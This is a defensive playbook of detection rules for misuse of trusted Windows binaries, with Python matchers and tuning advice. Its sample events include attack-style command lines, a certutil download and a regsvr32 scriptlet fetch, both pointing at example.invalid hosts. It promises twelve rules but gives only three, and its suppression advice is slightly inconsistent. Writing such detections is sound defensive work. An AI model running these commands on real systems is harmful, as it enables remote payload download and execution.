Detection Engineering Playbook: Sigma Rules for LOLBAS Living-Off-the-Land Persistence
67% of post-compromise persistence in H1 2026 used legitimate Windows binaries. Here are 12 production Sigma rules for the highest-volume LOLBAS techniques, with tuning notes and MITRE ATT&CK mappings.
Living-off-the-land binary (LOLBAS) abuse is the dominant persistence technique in modern intrusions. Attackers use legitimate Windows system binaries to download payloads, execute code, and move laterally — because these binaries are trusted, signed, and often excluded from security tool monitoring.
This playbook provides 12 production-ready Sigma rules for the most-abused LOLBAS binaries, with tuning guidance and MITRE ATT&CK mappings for each.
MITRE ATT&CK Technique Coverage
| Binary | ATT&CK Technique | Primary abuse | False positive risk |
|---|---|---|---|
| certutil.exe | T1140, T1105 | Encoded payload decode + download | Medium — legitimate PKI use |
| mshta.exe | T1218.005 | Remote HTA/VBScript execution | Low — rarely used legitimately |
| regsvr32.exe | T1218.010 | COM scriptlet (SCT) bypass execution | Medium — legitimate DLL registration |
| wmic.exe | T1047 | Remote WMI process creation | High — common in enterprise automation |
| rundll32.exe | T1218.011 | Shellcode injection via DLL export | High — very common legitimate use |
| bitsadmin.exe | T1197 | BITS job for payload download + persistence | Low — rarely used in modern OS |
| cmstp.exe | T1218.003 | INF file UAC bypass + code execution | Very low — almost no legitimate use |
| msiexec.exe | T1218.007 | Remote MSI payload execution | High — common software deployment |
| ieexec.exe | T1218 | Trusted binary remote payload download | Low — obsolete binary |
| odbcconf.exe | T1218.008 | REGSVR action to load DLL without regsvr32 | Very low — rare legitimate use |
| scrobj.dll | T1218.010 | Scriptlet registration via rundll32 | Low — uncommon legitimate use |
| InstallUtil.exe | T1218.004 | AppLocker bypass via .NET installer class | Low — uncommon in production |
Rule 1 — certutil Encoded Payload Download
certutil -decode and certutil -urlcache are the most commonly observed certutil abuse patterns. This rule fires on command lines containing decode or urlcache combined with a network path or Base64 indicators.
Rule 2 — mshta Remote HTA Execution
mshta.exe executing content from a remote URL or a network share is almost never legitimate in a corporate environment. The rule fires on any mshta process with a URL (http/https/ftp) or UNC path (\\) in the command line.
Rule 3 — regsvr32 COM Scriptlet Execution
regsvr32 /s /n /u /i:<url> scrobj.dll is the classic Squiblydoo bypass. The rule fires on any regsvr32 invocation with a remote URL, /i flag, or scrobj.dll in the command line.
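The three rules above expressed as Python matchers over Sysmon-style process-creation events rather than as Sigma YAML, as an added example that is not part of the playbook: field names (Image, CommandLine, User) follow the Sysmon process_creation schema that Sigma's logsource maps to, and the sample events with their example.invalid URLs are constructed for illustration.

```python
import re

URL_RE = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)   # remote URL indicator
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")                        # \\host\share indicator
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")               # long base64-looking token

def image_name(event):
    """Basename of the Image field, lower-cased (Sysmon process_creation schema)."""
    return event.get("Image", "").rsplit("\\", 1)[-1].lower()

def rule1_certutil(event):
    """Rule 1: certutil decode/urlcache plus a URL, UNC path or long base64 token."""
    cl = event.get("CommandLine", "")
    flag = re.search(r"[-/](?:decode|urlcache)\b", cl, re.IGNORECASE)
    indicator = URL_RE.search(cl) or UNC_RE.search(cl) or B64_RE.search(cl)
    return image_name(event) == "certutil.exe" and bool(flag and indicator)

def rule2_mshta(event):
    """Rule 2: mshta with a URL or UNC path anywhere in the command line."""
    cl = event.get("CommandLine", "")
    return image_name(event) == "mshta.exe" and bool(URL_RE.search(cl) or UNC_RE.search(cl))

def rule3_regsvr32(event):
    """Rule 3: regsvr32 with a remote URL, an /i: argument, or scrobj.dll (Squiblydoo)."""
    cl = event.get("CommandLine", "")
    hit = URL_RE.search(cl) or re.search(r"/i:", cl, re.IGNORECASE) or "scrobj.dll" in cl.lower()
    return image_name(event) == "regsvr32.exe" and bool(hit)

RULES = {"Rule 1 - certutil": rule1_certutil, "Rule 2 - mshta": rule2_mshta,
         "Rule 3 - regsvr32": rule3_regsvr32}

def evaluate(event, suppressed_users=frozenset()):
    """Titles of the rules that fire. Suppression is keyed on User, never on the
    parent image, following the tuning guidance in this playbook."""
    if event.get("User") in suppressed_users:
        return []
    return [title for title, match in RULES.items() if match(event)]

SAMPLE_EVENTS = {  # constructed for this example, not real telemetry
    "certutil_fetch": {"Image": r"C:\Windows\System32\certutil.exe", "User": r"CORP\alice",
                       "CommandLine": "certutil -urlcache -split -f http://example.invalid/a.txt a.txt"},
    "certutil_benign": {"Image": r"C:\Windows\System32\certutil.exe", "User": r"CORP\pki-svc",
                        "CommandLine": "certutil -dump C:\\certs\\root.cer"},
    "mshta_remote": {"Image": r"C:\Windows\System32\mshta.exe", "User": r"CORP\bob",
                     "CommandLine": r"mshta \\fileserver\share\page.hta"},
    "regsvr32_sct": {"Image": r"C:\Windows\System32\regsvr32.exe", "User": r"CORP\bob",
                     "CommandLine": "regsvr32 /s /n /u /i:http://example.invalid/x.sct scrobj.dll"},
    "regsvr32_benign": {"Image": r"C:\Windows\System32\regsvr32.exe", "User": r"CORP\admin",
                        "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\lib.dll"'},
}
```

Running `evaluate` over each entry of `SAMPLE_EVENTS` shows only the three abuse patterns firing, and the benign certutil and regsvr32 invocations staying silent.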
Tuning Guidance
Deploy all 12 rules initially in alert-only (no block) mode. Collect 14 days of data and identify false-positive patterns in your environment. Common suppressions: wmic from known IT automation service accounts, msiexec from software deployment server IPs, rundll32 from known software installation paths. Never suppress by parent process alone — attackers routinely spoof parent process names.
- Start in detection-only mode — collect baselines before adding suppression
- Suppress by ComputerName or User for known automation, not by binary path
- Alert on newly-seen combinations (binary + parent process + user) rather than absolute detection
- Review and re-tune monthly — attacker tooling evolves to evade stale suppression rules
- Cross-correlate LOLBAS detections with network anomalies — isolated LOLBAS events have lower fidelity